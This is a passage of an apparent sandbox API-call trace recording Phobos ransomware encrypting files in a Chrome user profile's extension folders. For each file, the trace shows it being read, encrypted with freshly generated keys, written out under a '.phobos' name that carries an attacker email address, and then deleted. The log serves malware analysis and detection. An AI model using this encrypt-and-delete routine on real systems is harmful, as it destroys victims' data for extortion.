data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sv\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0151.930] GetFileSizeEx (in: hFile=0x148, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=179) returned 1 [0151.930] CloseHandle (hObject=0x148) returned 1 [0151.930] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sv\\messages.json")) returned 0x2020 [0151.930] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sv\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sv\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0151.931] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sv\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0151.931] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0151.931] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0151.931] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sv\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sv\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0151.931] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32c28) returned 1 [0151.931] CryptSetKeyParam (hKey=0xa32c28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0151.931] ReadFile (in: hFile=0x148, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0xb3, lpOverlapped=0x0) returned 1 [0151.932] CryptEncrypt (in: hKey=0xa32c28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xc0, dwBufLen=0xc0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xc0) returned 1 [0151.933] WriteFile (in: hFile=0x188, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xc0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xc0, lpOverlapped=0x0) returned 1 [0151.934] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32d28) returned 1 [0151.934] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0151.934] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0151.934] CryptDestroyKey (hKey=0xa32d28) returned 1 [0151.934] WriteFile (in: hFile=0x188, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0151.934] CryptDestroyKey (hKey=0xa32c28) returned 1 [0151.934] CloseHandle (hObject=0x148) returned 1 [0151.934] CloseHandle (hObject=0x188) returned 1 [0151.934] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sv\\messages.json")) returned 1 [0151.938] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0151.938] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\th\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\th\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0151.938] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=179) returned 1 [0151.938] CloseHandle (hObject=0x188) returned 1 [0151.938] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\th\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\th\\messages.json")) returned 0x2020 [0151.938] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\th\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\th\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0151.938] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\th\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\th\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0151.939] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0151.939] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0151.939] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\th\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\th\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0151.939] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32c28) returned 1 [0151.939] CryptSetKeyParam (hKey=0xa32c28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0151.939] ReadFile (in: hFile=0x188, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0xb3, lpOverlapped=0x0) returned 1 [0151.981] CryptEncrypt (in: hKey=0xa32c28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xc0, dwBufLen=0xc0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xc0) returned 1 [0151.981] WriteFile (in: hFile=0x148, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xc0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xc0, lpOverlapped=0x0) returned 1 [0151.982] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa327e8) returned 1 [0151.983] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0151.983] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0151.983] CryptDestroyKey (hKey=0xa327e8) returned 1 [0151.983] WriteFile (in: hFile=0x148, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0151.983] CryptDestroyKey (hKey=0xa32c28) returned 1 [0151.983] CloseHandle (hObject=0x188) returned 1 [0151.983] CloseHandle (hObject=0x148) returned 1 [0151.983] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\th\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\th\\messages.json")) returned 1 [0151.984] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0151.984] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\icon_128.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\icon_128.png"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0151.988] GetFileSizeEx (in: hFile=0x148, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=3399) returned 1 [0151.988] CloseHandle (hObject=0x148) returned 1 [0151.988] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\icon_128.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\icon_128.png")) returned 0x2020 [0151.988] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\icon_128.png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\icon_128.png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0152.024] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\icon_128.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\icon_128.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0152.024] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0152.024] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0152.024] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\icon_128.png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\icon_128.png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0152.024] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32c28) returned 1 [0152.024] CryptSetKeyParam (hKey=0xa32c28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0152.024] ReadFile (in: hFile=0x148, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0xd47, lpOverlapped=0x0) returned 1 [0152.200] CryptEncrypt (in: hKey=0xa32c28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xd50, dwBufLen=0xd50 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xd50) returned 1 [0152.200] WriteFile (in: hFile=0x188, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xd50, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xd50, lpOverlapped=0x0) returned 1 [0152.202] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32d28) returned 1 [0152.202] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0152.202] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0152.202] CryptDestroyKey (hKey=0xa32d28) returned 1 [0152.202] WriteFile (in: hFile=0x188, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0152.202] CryptDestroyKey (hKey=0xa32c28) returned 1 [0152.202] CloseHandle (hObject=0x148) returned 1 [0152.202] CloseHandle (hObject=0x188) returned 1 [0152.202] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\icon_128.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\icon_128.png")) returned 1 [0152.203] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0152.203] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\main.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\main.html"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0152.204] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=92) returned 1 [0152.204] CloseHandle (hObject=0x188) returned 1 [0152.204] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\main.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\main.html")) returned 0x2020 [0152.204] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\main.html.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\main.html.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0152.204] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\main.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\main.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0152.204] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0152.204] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0152.204] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\main.html.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\main.html.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0152.204] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32c28) returned 1 [0152.204] CryptSetKeyParam (hKey=0xa32c28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0152.205] ReadFile (in: hFile=0x188, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x5c, lpOverlapped=0x0) returned 1 [0152.205] CryptEncrypt (in: hKey=0xa32c28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x60, dwBufLen=0x60 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x60) returned 1 [0152.205] WriteFile (in: hFile=0x148, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x60, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x60, lpOverlapped=0x0) returned 1 [0152.208] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32d28) returned 1 [0152.208] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0152.208] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0152.208] CryptDestroyKey (hKey=0xa32d28) returned 1 [0152.208] WriteFile (in: hFile=0x148, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0152.208] CryptDestroyKey (hKey=0xa32c28) returned 1 [0152.208] CloseHandle (hObject=0x188) returned 1 [0152.208] CloseHandle (hObject=0x148) returned 1 [0152.209] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\main.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\main.html")) returned 1 [0152.209] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0152.209] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\main.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\main.js"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0152.210] GetFileSizeEx (in: hFile=0x148, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=95) returned 1 [0152.210] CloseHandle (hObject=0x148) returned 1 [0152.210] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\main.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\main.js")) returned 0x2020 [0152.210] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\main.js.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\main.js.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0152.210] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\main.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\main.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0152.210] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0152.210] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0152.210] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\main.js.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js 